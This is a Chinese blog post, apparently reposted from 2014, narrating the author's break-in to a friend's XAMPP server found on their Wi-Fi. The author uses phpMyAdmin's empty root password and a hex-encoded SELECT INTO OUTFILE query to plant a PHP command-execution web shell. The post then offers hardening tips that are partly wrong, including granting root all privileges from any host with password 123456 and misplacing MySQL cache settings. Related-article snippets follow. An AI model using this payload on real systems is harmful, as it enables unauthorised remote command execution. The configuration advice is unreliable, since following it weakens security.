摘要:记录一次关于无聊时对基友服务器的提权攻击。登进去后,就想办法留个后门,搞个木马。进去以后,只要访问就能直接打命令了。这是提高性最有效的方法之一,而且这是被的数据库引擎处理的。
记录一次关于无聊时对基友MYSQL服务器的提权攻击。 尽管没有完全攻击到对方,并且没有清理痕迹,但是,这里写写简单的防御方式。
今晚无聊时候,本想打开电脑扫下谁连进我wifi,无意间,眼睛一亮看到了一个惊喜。
看到80端口,就有种冲动想要进去,进去后发现forbidden,然后试了试 phpmyadmin,发现直接进去,因为基友用的XAMPP集成环境,一下就猜到空密码。
登进去后,就想办法留个后门,搞个木马。注意一下,mysql是以管理员权限运行的,so...
查了下资料,这个很简单,网上很多。
找个一个表进去,用下面那句话,就搞定了。
SELECT 0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E FROM user into outfile "/Applications/XAMPP/xamppfiles/phpmyadmin/fuck.php"
那一串字符就是 的十六进制编码了,只要路径对,就ok了。
进去以后,只要访问 /phpmyadmin/fuck.php?cmd= 就能直接打terminal命令了。
可以看到我输入ls /输出了跟目录下面的文件和文件夹。
这个时候,如果是win党,来个中国菜刀!!!啊啊啊,条子!!带走!!!
下面说下个人经历,关于MAC下,xampp环境的安全处理。
A.关闭phpmyadmin远程登录vim /Applications/XAMPP/xamppfiles/etc/extra/http-xmapp.conf
在最底下添加访问权限,以及关闭修改权限。
Require local ErrorDocument 403 /error/XAMPP_FORBIDDEN.html.var
vim /Applications/XAMPP/xamppfiles/apache2/conf/httpd.conf
Options Indexes FollowSymLinks AllowOverride All Order allow,deny Deny from all #拒绝远程访问
这里不是所有都能写入的,只要关闭了用户写入权限,就不能写入木马了。这个时候,就需要对xampp配置做处理下。
这是我本地测试:
关闭mysql写入文件权限(我本地的):
vim /Applications/XAMPP/xamppfiles/etc/extra/http-xmapp.conf
# since XAMPP 1.4.3AllowOverride AuthConfig Limit Require all granted
不管怎么样,反正记得,创建的文件夹,非不得已,不要 chmod 777,特别是upload等目录,注意防范。
1、进入到phpmyadmin后,直接执行SQL语句:
update user set password=password("123456") where User="root" GRANT ALL PRIVILEGES ON *.* TO "root"@"%" IDENTIFIED BY "123456" WITH GRANT OPTION;
2、直接修改
vim /Applications/XAMPP/xamppfiles/etc/my.conf
找到19行:
password = your_password
/Applications/XAMPP/xamppfiles/etc/httpd.conf
52行:
Mysql 3306端口configure在:/Applications/XAMPP/xamppfiles/etc/my.conf
20行
2、添加vhost/Applications/XAMPP/xamppfiles/etc/extra/http-vhost.conf
3、配置Mysql缓存大小大多数的MySQL服务器都开启了查询缓存。这是提高性最有效的方法之一,而且这是被MySQL的数据库引擎处理的。当有很多相同的查询被执行了多次的时候,这些查询结果会被放到一个缓存中,这样,后续的相同的查询就不用操作表而直接访问缓存结果了。
/Applications/XAMPP/xamppfiles/etc/httpd.conf
最后面:
[isamchk] key_buffer = 20M sort_buffer_size = 20M read_buffer = 2M write_buffer = 2M
-by小草
2014-12-27 02:46:38
文章版权归作者所有,未经允许请勿转载,若此文章存在违规行为,您可以联系管理员删除。
转载请注明本文地址:https://www.ucloud.cn/yun/46422.html
摘要:渗透攻击渗透攻击是指有攻击者或渗透测试者利用一个系统应用或服务中的安全漏洞,所进行的攻击行为。是指在渗透攻击时作为攻击载荷运行的一组机器指令。 域 将网络中多台计算机逻辑上组织到一起,进行集中管理,这种区别于工作组的逻辑环境叫做域,域是组织与存储资源的核心管理单元,在域中,至少有一台域控制器...
摘要:一服务类弱口令漏洞利用可以上传包上传慢速攻击文件包含漏洞后台弱口令后台部署包反序列化远程代码执行后台弱口令任意文件泄露反序列化后台弱口令后台部署包测试页面上传反序列化暴力 ...
摘要:后渗透模块该模块主要用于在取得目标系统远程控制权后,进行一系列的后渗透攻击动作,如获取敏感信息实施跳板攻击等。我将通过一个完整的渗透测试来进行框架的初步讲解,这是我在一次实战中的操作,我用虚拟机进行了简单的模拟。其中,是被迁徙的进程。 ...
摘要:攻击者可能会窃取或修改此类保护不力的数据,以实施信用卡欺诈身份盗用或其他犯罪活动。跨站脚本攻击漏洞的防御策略前端过滤字符,后端白名单例如,只允许固定的标签,设置,防止被读取。 目录 WEB安全 OWASP Top 10(2017) Injection - 注入攻击 Broken Authen...
摘要:前言这次练习的靶机是平台下的系列靶机第台,下载地址为。指定有注入漏洞的参数。指定要查询的数据库列出所有表名发现有一个叫的表,账号和密码应该存在这个表中,查询一下该表中的数据。 ...
阅读 3275·2021-10-08 10:04
阅读 674·2019-08-30 15:54
阅读 2051·2019-08-29 16:09
阅读 1237·2019-08-29 15:41
阅读 2172·2019-08-29 11:01
阅读 1624·2019-08-26 13:51
阅读 912·2019-08-26 13:25
阅读 1634·2019-08-26 13:24